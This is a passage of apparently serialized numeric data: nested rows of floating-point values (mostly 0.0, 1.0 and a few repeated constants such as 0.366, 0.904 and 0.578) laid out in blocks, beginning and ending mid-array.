1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, 